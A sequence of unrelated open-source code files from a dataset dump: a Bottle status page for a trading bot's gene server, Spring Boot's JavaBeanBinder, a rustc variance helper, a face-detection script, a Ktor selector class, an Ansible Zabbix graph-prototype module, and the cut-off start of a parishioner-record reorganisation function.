#cross-platform hack to get the local ip address
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("www.google.com",80))
ip_address = s.getsockname()[0]
s.close()
__server__ = gene_server_config.__server__
__port__ = str(gene_server_config.__port__)
#make sure the port number matches the server.
server = xmlrpclib.Server('http://' + __server__ + ":" + __port__)
print "Connected to",__server__,":",__port__
#utility functions
def ppdict(d,nest=0):
#pretty print a dict
if nest > 0:
output = '<br>'
else:
output = ''
try:
for key in d.keys():
if type(d[key]) != type({}):
output += "---> "*nest + '<b>' + str(key) + '</b>' + ': ' + str(d[key]) + '<br>'
else:
output += '<b>' + str(key) + '</b>'+ ':' + ppdict(d[key],nest + 1) + '<br>'
except:
output += str(d)
return output
#define client functions
@route('/')
def index():
f = open('./report/system.templ','r')
template = f.read()
f.close()
gdhl = json.loads(server.get_gene_def_hash_list())
dgdh = json.loads(server.get_default_gene_def_hash())
pid = 'WC_SERVER'
server.pid_register_client(pid,dgdh)
trigger = "-"*80 + '<br>'
trigger += "Current Volitility Quartile: " + str(server.get_active_quartile()) + '<br>'
trigger += "Buy Order Trigger* @ $"+"%.2f"%json.loads(server.get_target(pid))['buy'] + '<br>' * 2
trigger += "* Will report $0 if target is too far away from the current price.<br> bcbookie also uses additional logic to screen potential orders.<br>"
trigger += "-"*80 + '<br>' * 2
clients = "-"*80 + '<br>'
clients += "Gene Library (" + str(len(gdhl)) + ')<br>'
for gdh in gdhl:
clients += "----><a href='./set_default_db/%s'>"%gdh + gdh + "</a><br>"
try:
clients += "-------->" + json.loads(server.get_gene_def(gdh))['name'] + '<br>'
except:
pass
clients += "Default Gene Def Hash: " + dgdh + '<br>'
clients += "-"*80 + '<br>' * 2
clients += "-"*80 + '<br>'
pid_list = json.loads(server.pid_list(180))
clients += "Active Clients (" + str(len(pid_list)) + ')<br>'
for apid in pid_list:
clients += "----> "+ apid + '<br>'
clients += "-"*80 + '<br>' * 2
pids = json.loads(server.get_pids())
monitor = "-"*80 + '<br>'
monitor += "Process monitor info (by PID)" + '<br>'
monitor += "-"*80 + '<br>'
monitor += ppdict(pids) + '<br>'*2
monitor = monitor.replace('\n','<br>')
best = "-"*80 + '<br>'
best += "Highest scoring genes (per quartile)" + '<br>'
best += "-"*80 + '<br>'
for quartile in [1,2,3,4]:
try:
ag = json.loads(server.get(60*60*24,quartile,pid))
except:
ag = {"Gene server didn't return a dictionary.":"Gene server didn't return a dictionary."}
best += "-"*80 + '<br>'
best += "Quartile: " + str(quartile) + " :: " + str(time.ctime()) + '<br>'
best += ppdict(ag) + '<br>'
best = best.replace('\n','<br>')
template = template.replace('{LAST_UPDATE}',time.ctime())
template = template.replace('{SYS_TRIGGER}',trigger)
template = template.replace('{SYS_MONITOR}',monitor)
template = template.replace('{SYS_CLIENTS}',clients)
template = template.replace('{SYS_BEST_GENES}',best)
return template
@route('/set_default_db/<db_hash>')
def set_default_db(db_hash = None):
server.set_default_gene_def_hash(db_hash)
return redirect("/")
@route('/report/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./report')
@route('/img/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./report/img')
@route('/js/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='./report/js')
run(host=ip_address, port=PORT)
print "http://" + ip_address + ":" + str(PORT) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2012-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.context.properties.bind;
import java.beans.Introspector;
import java.lang.annotation.Annotation;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Arrays;
import java.util.Comparator;
import java.util.LinkedHashMap;
import java.util.LinkedHashSet;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.BiConsumer;
import java.util.function.Function;
import java.util.function.Supplier;
import org.jspecify.annotations.Nullable;
import org.springframework.beans.BeanUtils;
import org.springframework.boot.context.properties.bind.Binder.Context;
import org.springframework.boot.context.properties.source.ConfigurationPropertyName;
import org.springframework.boot.context.properties.source.ConfigurationPropertySource;
import org.springframework.boot.context.properties.source.ConfigurationPropertyState;
import org.springframework.core.BridgeMethodResolver;
import org.springframework.core.MethodParameter;
import org.springframework.core.ResolvableType;
import org.springframework.util.Assert;
/**
* {@link DataObjectBinder} for mutable Java Beans.
*
* @author Phillip Webb
* @author Madhura Bhave
* @author Lasse Wulff
*/
class JavaBeanBinder implements DataObjectBinder {
private static final String HAS_KNOWN_BINDABLE_PROPERTIES_CACHE = JavaBeanBinder.class.getName()
+ ".HAS_KNOWN_BINDABLE_PROPERTIES_CACHE";
static final JavaBeanBinder INSTANCE = new JavaBeanBinder();
@Override
public <T> @Nullable T bind(ConfigurationPropertyName name, Bindable<T> target, Context context,
DataObjectPropertyBinder propertyBinder) {
boolean hasKnownBindableProperties = target.getValue() != null && hasKnownBindableProperties(name, context);
Bean<T> bean = Bean.get(target, context, hasKnownBindableProperties);
if (bean == null) {
return null;
}
BeanSupplier<T> beanSupplier = bean.getSupplier(target);
boolean bound = bind(propertyBinder, bean, beanSupplier, context);
return (bound ? beanSupplier.get() : null);
}
@Override
@SuppressWarnings("unchecked")
public <T> @Nullable T create(Bindable<T> target, Context context) {
Class<T> type = (Class<T>) target.getType().resolve();
return (type != null) ? BeanUtils.instantiateClass(type) : null;
}
private boolean hasKnownBindableProperties(ConfigurationPropertyName name, Context context) {
Map<ConfigurationPropertyName, Boolean> cache = getHasKnownBindablePropertiesCache(context);
Boolean hasKnownBindableProperties = cache.get(name);
if (hasKnownBindableProperties == null) {
hasKnownBindableProperties = computeHasKnownBindableProperties(name, context);
cache.put(name, hasKnownBindableProperties);
}
return hasKnownBindableProperties;
}
private boolean computeHasKnownBindableProperties(ConfigurationPropertyName name, Context context) {
for (ConfigurationPropertySource source : context.getSources()) {
if (source.containsDescendantOf(name) == ConfigurationPropertyState.PRESENT) {
return true;
}
}
return false;
}
@SuppressWarnings("unchecked")
private Map<ConfigurationPropertyName, Boolean> getHasKnownBindablePropertiesCache(Context context) {
Object cache = context.getCache().get(HAS_KNOWN_BINDABLE_PROPERTIES_CACHE);
if (cache == null) {
cache = new ConcurrentHashMap<ConfigurationPropertyName, Boolean>();
context.getCache().put(HAS_KNOWN_BINDABLE_PROPERTIES_CACHE, cache);
}
return (Map<ConfigurationPropertyName, Boolean>) cache;
}
private <T> boolean bind(DataObjectPropertyBinder propertyBinder, Bean<T> bean, BeanSupplier<T> beanSupplier,
Context context) {
boolean bound = false;
for (BeanProperty beanProperty : bean.getProperties().values()) {
bound |= bind(beanSupplier, propertyBinder, beanProperty);
context.clearConfigurationProperty();
}
return bound;
}
private <T> boolean bind(BeanSupplier<T> beanSupplier, DataObjectPropertyBinder propertyBinder,
BeanProperty property) {
String propertyName = determinePropertyName(property);
ResolvableType type = property.getType();
Supplier<Object> value = property.getValue(beanSupplier);
Annotation[] annotations = property.getAnnotations();
Object bound = propertyBinder.bindProperty(propertyName,
Bindable.of(type).withSuppliedValue(value).withAnnotations(annotations));
if (bound == null) {
return false;
}
if (property.isSettable()) {
property.setValue(beanSupplier, bound);
}
else if (value == null || !bound.equals(value.get())) {
throw new IllegalStateException("No setter found for property: " + property.getName());
}
return true;
}
private String determinePropertyName(BeanProperty property) {
return Arrays.stream((property.getAnnotations() != null) ? property.getAnnotations() : new Annotation[0])
.filter((annotation) -> annotation.annotationType() == Name.class)
.findFirst()
.map(Name.class::cast)
.map(Name::value)
.orElse(property.getName());
}
/**
* The properties of a bean that may be bound.
*/
static class BeanProperties {
private final Map<String, BeanProperty> properties = new LinkedHashMap<>();
private final ResolvableType type;
private final Class<?> resolvedType;
BeanProperties(ResolvableType type, Class<?> resolvedType) {
this.type = type;
this.resolvedType = resolvedType;
addProperties(resolvedType);
}
private void addProperties(Class<?> type) {
while (type != null && !Object.class.equals(type)) {
Method[] declaredMethods = getSorted(type, this::getDeclaredMethods, Method::getName);
Field[] declaredFields = getSorted(type, Class::getDeclaredFields, Field::getName);
addProperties(declaredMethods, declaredFields);
type = type.getSuperclass();
}
}
private Method[] getDeclaredMethods(Class<?> type) {
Method[] methods = type.getDeclaredMethods();
Set<Method> result = new LinkedHashSet<>(methods.length);
for (Method method : methods) {
result.add(BridgeMethodResolver.findBridgedMethod(method));
}
return result.toArray(new Method[0]);
}
private <S, E> E[] getSorted(S source, Function<S, E[]> elements, Function<E, String> name) {
E[] result = elements.apply(source);
Arrays.sort(result, Comparator.comparing(name));
return result;
}
protected void addProperties(Method[] declaredMethods, Field[] declaredFields) {
@Nullable Method[] methods = new Method[declaredMethods.length];
for (int i = 0; i < declaredMethods.length; i++) {
methods[i] = isCandidate(declaredMethods[i]) ? declaredMethods[i] : null;
}
for (Method method : methods) {
addMethodIfPossible(method, "is", 0, BeanProperty::addGetter);
}
for (Method method : methods) {
addMethodIfPossible(method, "get", 0, BeanProperty::addGetter);
}
for (Method method : methods) {
addMethodIfPossible(method, "set", 1, BeanProperty::addSetter);
}
for (Field field : declaredFields) {
addField(field);
}
}
private boolean isCandidate(Method method) {
int modifiers = method.getModifiers();
return !Modifier.isPrivate(modifiers) && !Modifier.isProtected(modifiers) && !Modifier.isAbstract(modifiers)
&& !Modifier.isStatic(modifiers) && !method.isBridge()
&& !Object.class.equals(method.getDeclaringClass())
&& !Class.class.equals(method.getDeclaringClass()) && method.getName().indexOf('$') == -1;
}
private void addMethodIfPossible(@Nullable Method method, String prefix, int parameterCount,
BiConsumer<BeanProperty, Method> consumer) {
if (method != null && method.getParameterCount() == parameterCount && method.getName().startsWith(prefix)
&& method.getName().length() > prefix.length()) {
String propertyName = Introspector.decapitalize(method.getName().substring(prefix.length()));
consumer.accept(this.properties.computeIfAbsent(propertyName, this::getBeanProperty), method);
}
}
private BeanProperty getBeanProperty(String name) {
return new BeanProperty(name, this.type);
}
private void addField(Field field) {
BeanProperty property = this.properties.get(field.getName());
if (property != null) {
property.addField(field);
}
}
protected final ResolvableType getType() {
return this.type;
}
protected final Class<?> getResolvedType() {
return this.resolvedType;
}
final Map<String, BeanProperty> getProperties() {
return this.properties;
}
static BeanProperties of(Bindable<?> bindable) {
ResolvableType type = bindable.getType();
Class<?> resolvedType = type.resolve(Object.class);
return new BeanProperties(type, resolvedType);
}
}
/**
* The bean being bound.
*
* @param <T> the bean type
*/
static class Bean<T> extends BeanProperties {
Bean(ResolvableType type, Class<?> resolvedType) {
super(type, resolvedType);
}
@SuppressWarnings("unchecked")
BeanSupplier<T> getSupplier(Bindable<T> target) {
return new BeanSupplier<>(() -> {
T instance = null;
if (target.getValue() != null) {
instance = target.getValue().get();
}
if (instance == null) {
instance = (T) BeanUtils.instantiateClass(getResolvedType());
}
return instance;
});
}
@SuppressWarnings("unchecked")
static <T> @Nullable Bean<T> get(Bindable<T> bindable, Context context, boolean canCallGetValue) {
ResolvableType type = bindable.getType();
Class<?> resolvedType = type.resolve(Object.class);
Supplier<T> value = bindable.getValue();
T instance = null;
if (canCallGetValue && value != null) {
instance = value.get();
resolvedType = (instance != null) ? instance.getClass() : resolvedType;
}
if (instance == null && !isInstantiable(resolvedType)) {
return null;
}
Map<CacheKey, Bean<?>> cache = getCache(context);
CacheKey cacheKey = new CacheKey(type, resolvedType);
Bean<?> bean = cache.get(cacheKey);
if (bean == null) {
bean = new Bean<>(type, resolvedType);
cache.put(cacheKey, bean);
}
return (Bean<T>) bean;
}
@SuppressWarnings("unchecked")
private static Map<CacheKey, Bean<?>> getCache(Context context) {
Map<CacheKey, Bean<?>> cache = (Map<CacheKey, Bean<?>>) context.getCache().get(Bean.class);
if (cache == null) {
cache = new ConcurrentHashMap<>();
context.getCache().put(Bean.class, cache);
}
return cache;
}
private static boolean isInstantiable(Class<?> type) {
if (type.isInterface()) {
return false;
}
try {
type.getDeclaredConstructor();
return true;
}
catch (Exception ex) {
return false;
}
}
private record CacheKey(ResolvableType type, Class<?> resolvedType) {
}
}
private static class BeanSupplier<T> implements Supplier<T> {
private final Supplier<T> factory;
private @Nullable T instance;
BeanSupplier(Supplier<T> factory) {
this.factory = factory;
}
@Override
public T get() {
if (this.instance == null) {
this.instance = this.factory.get();
}
return this.instance;
}
}
/**
* A bean property being bound.
*/
static class BeanProperty {
private final String name;
private final ResolvableType declaringClassType;
private @Nullable Method getter;
private @Nullable Method setter;
private @Nullable Field field;
BeanProperty(String name, ResolvableType declaringClassType) {
this.name = DataObjectPropertyName.toDashedForm(name);
this.declaringClassType = declaringClassType;
}
void addGetter(Method getter) {
if (this.getter == null || this.getter.getName().startsWith("is")) {
this.getter = getter;
}
}
void addSetter(Method setter) {
if (this.setter == null || isBetterSetter(setter)) {
this.setter = setter;
}
}
private boolean isBetterSetter(Method setter) {
return this.getter != null && this.getter.getReturnType().equals(setter.getParameterTypes()[0]);
}
void addField(Field field) {
if (this.field == null) {
this.field = field;
}
}
String getName() {
return this.name;
}
ResolvableType getType() {
if (this.setter != null) {
MethodParameter methodParameter = new MethodParameter(this.setter, 0);
return ResolvableType.forMethodParameter(methodParameter, this.declaringClassType);
}
Assert.state(this.getter != null, "'getter' must not be null");
MethodParameter methodParameter = new MethodParameter(this.getter, -1);
return ResolvableType.forMethodParameter(methodParameter, this.declaringClassType);
}
Annotation @Nullable [] getAnnotations() {
try {
return (this.field != null) ? this.field.getDeclaredAnnotations() : null;
}
catch (Exception ex) {
return null;
}
}
@Nullable Supplier<Object> getValue(Supplier<?> instance) {
if (this.getter == null) {
return null;
}
return () -> {
Assert.state(this.getter != null, "'getter' must not be null");
try {
this.getter.setAccessible(true);
return this.getter.invoke(instance.get());
}
catch (Exception ex) {
if (isUninitializedKotlinProperty(ex)) {
return null;
}
throw new IllegalStateException("Unable to get value for property " + this.name, ex);
}
};
}
private boolean isUninitializedKotlinProperty(Exception ex) {
return (ex instanceof InvocationTargetException invocationTargetException)
&& "kotlin.UninitializedPropertyAccessException"
.equals(invocationTargetException.getTargetException().getClass().getName());
}
boolean isSettable() {
return this.setter != null;
}
void setValue(Supplier<?> instance, Object value) {
Assert.state(this.setter != null, "'setter' must not be null");
try {
this.setter.setAccessible(true);
this.setter.invoke(instance.get(), value);
}
catch (Exception ex) {
throw new IllegalStateException("Unable to set value for property " + this.name, ex);
}
}
@Nullable Method getGetter() {
return this.getter;
}
@Nullable Method getSetter() {
return this.setter;
}
@Nullable Field getField() {
return this.field;
}
}
} | java | github | https://github.com/spring-projects/spring-boot | core/spring-boot/src/main/java/org/springframework/boot/context/properties/bind/JavaBeanBinder.java |
use std::fmt::Write;
use rustc_hir::attrs::AttributeKind;
use rustc_hir::def_id::{CRATE_DEF_ID, LocalDefId};
use rustc_hir::find_attr;
use rustc_middle::ty::{GenericArgs, TyCtxt};
fn format_variances(tcx: TyCtxt<'_>, def_id: LocalDefId) -> String {
let variances = tcx.variances_of(def_id);
let generics = GenericArgs::identity_for_item(tcx, def_id);
// 7 = 2-letter parameter + ": " + 1-letter variance + ", "
let mut ret = String::with_capacity(2 + 7 * variances.len());
ret.push('[');
for (arg, variance) in generics.iter().zip(variances.iter()) {
write!(ret, "{arg}: {variance:?}, ").unwrap();
}
// Remove trailing `, `.
if !variances.is_empty() {
ret.pop();
ret.pop();
}
ret.push(']');
ret
}
pub(crate) fn variances(tcx: TyCtxt<'_>) {
let crate_items = tcx.hir_crate_items(());
if find_attr!(tcx.get_all_attrs(CRATE_DEF_ID), AttributeKind::RustcVarianceOfOpaques) {
for id in crate_items.opaques() {
tcx.dcx().emit_err(crate::errors::VariancesOf {
span: tcx.def_span(id),
variances: format_variances(tcx, id),
});
}
}
for id in crate_items.free_items() {
if !find_attr!(tcx.get_all_attrs(id.owner_id), AttributeKind::RustcVariance) {
continue;
}
tcx.dcx().emit_err(crate::errors::VariancesOf {
span: tcx.def_span(id.owner_id),
variances: format_variances(tcx, id.owner_id.def_id),
});
}
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_hir_analysis/src/variance/dump.rs |
import numpy as np
from scipy import ndimage, misc
from matplotlib import pyplot as plt
import glob
from MyViola import MyViolaClassifier
from Svm import Svm
import funcs
def find_face(img, shape, mv):
res_i = (0, 0)
res_j = (0, 0)
res_scl = 1
max_ = 0
scales = np.arange(.2, .35, .025)
m, n = shape
for scl in scales:
img_ = misc.imresize(img, scl)
mv.change_image(img_)
x, y = img_.shape[:2]
if x < m or y < n:
continue
for i, j in funcs.iter_shape((x, y), shape, 4):
val = mv.valuefy((i, j))
if val > max_:
max_ = val
res_i, res_j = i, j
res_scl = scl
return (int(res_i[0] / res_scl), int(res_i[1] / res_scl)), (int(res_j[0] / res_scl), int(res_j[1] / res_scl))
def get_sub_pics_with_size(imgs, shape):
scales = np.arange(.2, 1, .2)
m, n = shape
for img in imgs:
while img.shape[0] > 800:
img = misc.imresize(img, 0.5)
for scl in scales:
img_ = misc.imresize(img, scl)
x, y = img_.shape[:2]
if x < m or y < n:
continue
i = 0
while i + m < x:
j = 0
while j + n < y:
yield img_[i:i+m, j:j+n]
j += n
i += m
def temp():
files = glob.glob('../../faces/cropped/*.jpg')
faces = (misc.imread(im) for im in files)
mv = MyViolaClassifier()
mv.add_examples(faces, 1)
files = glob.glob('../../faces/nofaces/*.jpg')
nofaces = (misc.imread(im) for im in files)
mv.add_examples(get_sub_pics_with_size(nofaces, (137, 100)), -1)
mv.learn()
mv.save('my_viola.pkl')
files = glob.glob('../../faces/*.jpg')
for f in files:
img = misc.imread(f)
new_path = f.replace('/faces\\', '/faces\\new1\\')
i, j = find_face(img, (137, 100), mv)
i1, i2 = i
j1, j2 = j
new_img = img[i1:i2, j1:j2]
try:
misc.imsave(new_path, new_img)
except ValueError:
pass
def plot_image_faces(img, shape, mv):
plot_im_with_rects(img, get_all_faces_rects(img, shape, mv))
def plot_im_with_rects(img, rect_list):
img1 = img
for rect in rect_list:
img1 = funcs.implusrect(img1, rect[0], rect[1], (0, 255, 0))
plt.imshow(img1)
def get_all_faces_rects(img, shape, mv):
return [a[0] for a in filter_overlap_windows(get_all_windows(img, shape, mv))]
def get_all_windows(img, shape, mv):
scales = np.arange(.2, .35, .02)
m, n = shape
for scl in scales:
img_ = misc.imresize(img, scl)
mv.change_image(img_)
x, y = img_.shape[:2]
if x < m or y < n:
continue
for i, j in funcs.iter_shape((x, y), shape, 4):
val = mv.valuefy((i, j))
if val > 0:
res_i = (int(i[0] / scl), int(i[1] / scl))
res_j = (int(j[0] / scl), int(j[1] / scl))
yield ((res_i, res_j), val)
def is_pos_in_rect(pos, rect):
x, y = pos
(i1, i2), (j1, j2) = rect
return i1 <= x <= i2 and j1 <= y <= j2
def mid_point(rect):
(i1, i2), (j1, j2) = rect
return int((i1 + i2) / 2), int((j1 + j2) / 2)
def are_overlap(window1, window2):
return is_pos_in_rect(mid_point(window1), window2) or is_pos_in_rect(mid_point(window2), window1)
def filter_overlap_windows(windows):
maxs = []
for w in windows:
w_waiting = True
index = 0
while index < len(maxs) and w_waiting:
if are_overlap(w[0], maxs[index][0]):
if w[1] > maxs[index][1]:
maxs[index] = w
w_waiting = False
index += 1
if w_waiting:
maxs.append(w)
return maxs | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2014-2019 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.network.selector
import kotlinx.coroutines.*
import java.util.concurrent.atomic.*
public class InterestSuspensionsMap {
@Volatile
private var readHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var writeHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var connectHandlerReference: CancellableContinuation<Unit>? = null
@Volatile
private var acceptHandlerReference: CancellableContinuation<Unit>? = null
public fun addSuspension(interest: SelectInterest, continuation: CancellableContinuation<Unit>) {
val updater = updater(interest)
if (!updater.compareAndSet(this, null, continuation)) {
error("Handler for ${interest.name} is already registered")
}
}
public inline fun invokeForEachPresent(readyOps: Int, block: CancellableContinuation<Unit>.() -> Unit) {
val flags = SelectInterest.flags
for (ordinal in flags.indices) {
if (flags[ordinal] and readyOps != 0) {
removeSuspension(ordinal)?.block()
}
}
}
public inline fun invokeForEachPresent(block: CancellableContinuation<Unit>.(SelectInterest) -> Unit) {
for (interest in SelectInterest.AllInterests) {
removeSuspension(interest)?.run { block(interest) }
}
}
public fun removeSuspension(interest: SelectInterest): CancellableContinuation<Unit>? =
updater(interest).getAndSet(this, null)
public fun removeSuspension(interestOrdinal: Int): CancellableContinuation<Unit>? =
updaters[interestOrdinal].getAndSet(this, null)
override fun toString(): String {
return "R $readHandlerReference W $writeHandlerReference C $connectHandlerReference A $acceptHandlerReference"
}
public companion object {
@Suppress("UNCHECKED_CAST")
private val updaters = SelectInterest.AllInterests.map { interest ->
val property = when (interest) {
SelectInterest.READ -> InterestSuspensionsMap::readHandlerReference
SelectInterest.WRITE -> InterestSuspensionsMap::writeHandlerReference
SelectInterest.ACCEPT -> InterestSuspensionsMap::acceptHandlerReference
SelectInterest.CONNECT -> InterestSuspensionsMap::connectHandlerReference
}
AtomicReferenceFieldUpdater.newUpdater(
InterestSuspensionsMap::class.java,
CancellableContinuation::class.java,
property.name
) as AtomicReferenceFieldUpdater<InterestSuspensionsMap, CancellableContinuation<Unit>?>
}.toTypedArray()
private fun updater(
interest: SelectInterest
): AtomicReferenceFieldUpdater<InterestSuspensionsMap, CancellableContinuation<Unit>?> =
updaters[interest.ordinal]
}
} | kotlin | github | https://github.com/ktorio/ktor | ktor-network/jvm/src/io/ktor/network/selector/InterestSuspensionsMap.kt |
#!/usr/bin/env python
'''
Ansible module for zabbix graphprototypes
'''
# vim: expandtab:tabstop=4:shiftwidth=4
#
# Zabbix graphprototypes ansible module
#
#
# Copyright 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#---
#- hosts: localhost
# gather_facts: no
# tasks:
# - zbx_graphprototype:
# zbx_server: https://zabbixserver/zabbix/api_jsonrpc.php
# zbx_user: Admin
# zbx_password: zabbix
# name: Test Graph
# height: 300
# width: 500
# graph_items:
# - item_name: Bytes per second IN on network interface {#OSO_NET_INTERFACE}
# color: red
# line_style: bold
# item_type: prototype
# - item_name: Template OS Linux: Bytes per second OUT on network interface {#OSO_NET_INTERFACE}
# item_type: prototype
#
#
# This is in place because each module looks similar to each other.
# These need duplicate code as their behavior is very similar
# but different for each zabbix class.
# pylint: disable=duplicate-code
# pylint: disable=import-error
from openshift_tools.monitoring.zbxapi import ZabbixAPI, ZabbixConnection
def exists(content, key='result'):
''' Check if key exists in content or the size of content[key] > 0
'''
if not content.has_key(key):
return False
if not content[key]:
return False
return True
def get_graph_type(graphtype):
'''
Possible values:
0 - normal;
1 - stacked;
2 - pie;
3 - exploded;
'''
gtype = 0
if 'stacked' in graphtype:
gtype = 1
elif 'pie' in graphtype:
gtype = 2
elif 'exploded' in graphtype:
gtype = 3
return gtype
def get_show_legend(show_legend):
'''Get the value for show_legend
0 - hide
1 - (default) show
'''
rval = 1
if 'hide' == show_legend:
rval = 0
return rval
def get_template_id(zapi, template_name):
'''
get related templates
'''
# Fetch templates by name
content = zapi.get_content('template',
'get',
{'filter': {'host': template_name},})
if content.has_key('result'):
return content['result'][0]['templateid']
return None
def get_color(color_in='black'):
''' Receive a color and translate it to a hex representation of the color
Will have a few setup by default
'''
colors = {'black': '000000',
'red': 'FF0000',
'pink': 'FFC0CB',
'purple': '800080',
'orange': 'FFA500',
'gold': 'FFD700',
'yellow': 'FFFF00',
'green': '008000',
'cyan': '00FFFF',
'aqua': '00FFFF',
'blue': '0000FF',
'brown': 'A52A2A',
'gray': '808080',
'grey': '808080',
'silver': 'C0C0C0',
}
if colors.has_key(color_in):
return colors[color_in]
return color_in
def get_line_style(style):
'''determine the line style
'''
line_style = {'line': 0,
'filled': 1,
'bold': 2,
'dot': 3,
'dashed': 4,
'gradient': 5,
}
if line_style.has_key(style):
return line_style[style]
return 0
def get_calc_function(func):
'''Determine the caclulation function'''
rval = 2 # default to avg
if 'min' in func:
rval = 1
elif 'max' in func:
rval = 4
elif 'all' in func:
rval = 7
elif 'last' in func:
rval = 9
return rval
def get_graph_item_type(gtype):
'''Determine the graph item type
'''
rval = 0 # simple graph type
if 'sum' in gtype:
rval = 2
return rval
def get_graph_items(zapi, gitems):
'''Get graph items by id'''
r_items = []
for item in gitems:
content = zapi.get_content('item%s' % item.get('item_type', ''),
'get',
{'filter': {'name': item['item_name']}})
_ = item.pop('item_name')
color = get_color(item.pop('color', 'black'))
drawtype = get_line_style(item.get('line_style', 'line'))
func = get_calc_function(item.get('calc_func', 'avg'))
g_type = get_graph_item_type(item.get('graph_item_type', 'simple'))
if content.has_key('result'):
tmp = {'itemid': content['result'][0]['itemid'],
'color': color,
'drawtype': drawtype,
'calc_fnc': func,
'type': g_type,
}
r_items.append(tmp)
return r_items
def compare_gitems(zabbix_items, user_items):
'''Compare zabbix results with the user's supplied items
return True if user_items are equal
return False if any of the values differ
'''
if len(zabbix_items) != len(user_items):
return False
for u_item in user_items:
for z_item in zabbix_items:
if u_item['itemid'] == z_item['itemid']:
if not all([str(value) == z_item[key] for key, value in u_item.items()]):
return False
return True
# The branches are needed for CRUD and error handling
# pylint: disable=too-many-branches
def main():
'''
ansible zabbix module for zbx_graphprototypes
'''
module = AnsibleModule(
argument_spec=dict(
zbx_server=dict(default='https://localhost/zabbix/api_jsonrpc.php', type='str'),
zbx_user=dict(default=os.environ.get('ZABBIX_USER', None), type='str'),
zbx_password=dict(default=os.environ.get('ZABBIX_PASSWORD', None), type='str'),
zbx_debug=dict(default=False, type='bool'),
name=dict(default=None, type='str'),
height=dict(default=None, type='int'),
width=dict(default=None, type='int'),
graph_type=dict(default='normal', type='str'),
show_legend=dict(default='show', type='str'),
state=dict(default='present', type='str'),
graph_items=dict(default=None, type='list'),
),
#supports_check_mode=True
)
zapi = ZabbixAPI(ZabbixConnection(module.params['zbx_server'],
module.params['zbx_user'],
module.params['zbx_password'],
module.params['zbx_debug']))
#Set the instance and the template for the rest of the calls
zbx_class_name = 'graphprototype'
state = module.params['state']
content = zapi.get_content(zbx_class_name,
'get',
{'filter': {'name': module.params['name']},
#'templateids': templateid,
'selectGraphItems': 'extend',
})
#******#
# GET
#******#
if state == 'list':
module.exit_json(changed=False, results=content['result'], state="list")
#******#
# DELETE
#******#
if state == 'absent':
if not exists(content):
module.exit_json(changed=False, state="absent")
content = zapi.get_content(zbx_class_name, 'delete', [content['result'][0]['graphid']])
module.exit_json(changed=True, results=content['result'], state="absent")
# Create and Update
if state == 'present':
params = {'name': module.params['name'],
'height': module.params['height'],
'width': module.params['width'],
'graphtype': get_graph_type(module.params['graph_type']),
'show_legend': get_show_legend(module.params['show_legend']),
'gitems': get_graph_items(zapi, module.params['graph_items']),
}
# Remove any None valued params
_ = [params.pop(key, None) for key in params.keys() if params[key] is None]
#******#
# CREATE
#******#
if not exists(content):
content = zapi.get_content(zbx_class_name, 'create', params)
if content.has_key('error'):
module.exit_json(failed=True, changed=True, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state='present')
########
# UPDATE
########
differences = {}
zab_results = content['result'][0]
for key, value in params.items():
if key == 'gitems':
if not compare_gitems(zab_results[key], value):
differences[key] = value
elif zab_results[key] != value and zab_results[key] != str(value):
differences[key] = value
if not differences:
module.exit_json(changed=False, results=zab_results, state="present")
# We have differences and need to update
differences['graphid'] = zab_results['graphid']
content = zapi.get_content(zbx_class_name, 'update', differences)
if content.has_key('error'):
module.exit_json(failed=True, changed=False, results=content['error'], state="present")
module.exit_json(changed=True, results=content['result'], state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main() | unknown | codeparrot/codeparrot-clean | ||
__copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import logging
from datetime import datetime
from glod.db.person import Person
from glod.db.organisation import Organisation, OrganisationCategory, OrganisationStatus
from glod.model.communication_permission import CommunicationPermission
from glod.db.organisation_address import OrganisationAddress
LOG = logging.getLogger(__file__)
INITIAL_GDPR_SURVEY = datetime(2018, 10, 30)
TRUE_STRINGS = ("true", "True", "TRUE", "yes", "Yes", "YES", "1")
IS_PRIMARY = 'primary'
def _reorganise_parishioner(parishioner, address_map, household_map):
new_entities = []
parishioner_status = parishioner.status.lower()
if parishioner_status == 'foreign list':
organisation_status = OrganisationStatus.Active
organisation_category = OrganisationCategory.NonLocalHousehold
else:
organisation_status = OrganisationStatus.Active if parishioner_status == 'active' else OrganisationStatus.Inactive
organisation_category = OrganisationCategory.Household
household_ref_no = parishioner.household_ref_no
if household_ref_no in household_map:
household = household_map[household_ref_no]
else:
household = Organisation(
parishioner.surname,
organisation_category,
organisation_status,
household_ref_no,
)
address = address_map[household_ref_no]
oa_link = OrganisationAddress(household, address)
household_map[household_ref_no] = household
new_entities = [household, oa_link]
person = Person(
household,
parishioner.surname,
parishioner.first_name,
title=parishioner.title,
